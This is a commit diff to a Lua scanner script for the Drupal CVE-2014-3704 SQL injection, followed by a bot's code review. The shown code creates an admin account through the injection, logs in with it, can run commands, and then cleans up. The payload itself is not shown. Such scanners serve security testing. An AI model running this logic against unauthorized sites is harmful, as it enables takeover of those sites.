
Improves detection of cve-2014-3704. Fixes #902. Closes #905.

This commit is contained in:
rewanth
2017-07-08 03:11:45 +00:00
parent d1e8388b7e
commit 30f0fab5bc


@@ -216,9 +216,11 @@ local function do_sql_query(host, port, uri, user)
} }
} }
local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r) local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
--TODO: Check return status
if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
return user, passwd return user, passwd
end
end end
local function set_php_filter(host, port, uri, session, disable) local function set_php_filter(host, port, uri, session, disable)
@@ -342,28 +344,15 @@ action = function(host, port)
cleanup = "false" cleanup = "false"
end end
local user, passwd = do_sql_query(host, port, uri, nil)
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = { local vuln = {
title = 'Drupal - pre Auth SQL Injection Vulnerability', title = 'Drupal - pre Auth SQL Injection Vulnerability',
state = vulns.STATE.NOT_VULN, state = vulns.STATE.NOT_VULN,
description = [[ description = [[
The expandArguments function in the database abstraction API in The expandArguments function in the database abstraction API in
Drupal core 7.x before 7.32 does not properly construct prepared Drupal core 7.x before 7.32 does not properly construct prepared
statements, which allows remote attackers to conduct SQL injection statements, which allows remote attackers to conduct SQL injection
attacks via an array containing crafted keys. attacks via an array containing crafted keys.
]], ]],
IDS = {CVE = 'CVE-2014-3704'}, IDS = {CVE = 'CVE-2014-3704'},
references = { references = {
@@ -375,9 +364,30 @@ attacks via an array containing crafted keys.
disclosure = {year = '2014', month = '10', day = '15'}, disclosure = {year = '2014', month = '10', day = '15'},
}, },
} }
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
local user, passwd = do_sql_query(host, port, uri, nil)
if user == nil or passwd == nil then
return vulnReport:make_output(vuln)
end
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
vuln.state = vulns.STATE.EXPLOIT vuln.state = vulns.STATE.EXPLOIT
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
if cmd ~= nil then if cmd ~= nil then
local session = {} local session = {}
session.name = res.cookies[1].name session.name = res.cookies[1].name
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
end end
end end
else
vuln.state = vulns.STATE.LIKELY_VULN
vuln.check_results = "Account created but unable to log in."
end
-- cleanup: remove admin user -- cleanup: remove admin user
if cleanup == nil then if cleanup == nil then
do_sql_query(host, port, uri, user) do_sql_query(host, port, uri, user)
end end
return vulnReport:make_output(vuln) return vulnReport:make_output(vuln)
end
end end
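Review bot: The new marker check in do_sql_query calls `string.match(res.body, …)` without first confirming that http.post returned a body, and the `--TODO: Check return status` comment added on the line above is left unresolved; if the response table has no body (which, as far as I recall, the NSE http library produces on a connection failure), `string.match` raises on a nil argument and the script aborts instead of reporting NOT_VULN. A one-line guard before the match covers it: `if not res or not res.body then return nil end`, which also lets the TODO comment be dropped since the status is now inspected. The same pattern recurs in the action hunk at `if res.status == 302 and res.cookies[1].name ~= nil then`, where a 302 that carries no Set-Cookie leaves `res.cookies[1]` nil and the `.name` index raises; `res.cookies[1] and res.cookies[1].name ~= nil` would be the safe form. do_sql_query's body begins outside the first hunk, so I could not confirm whether the new early return after `if user == nil or passwd == nil then` can skip cleanup of an account the injected query already created — worth checking against the full function.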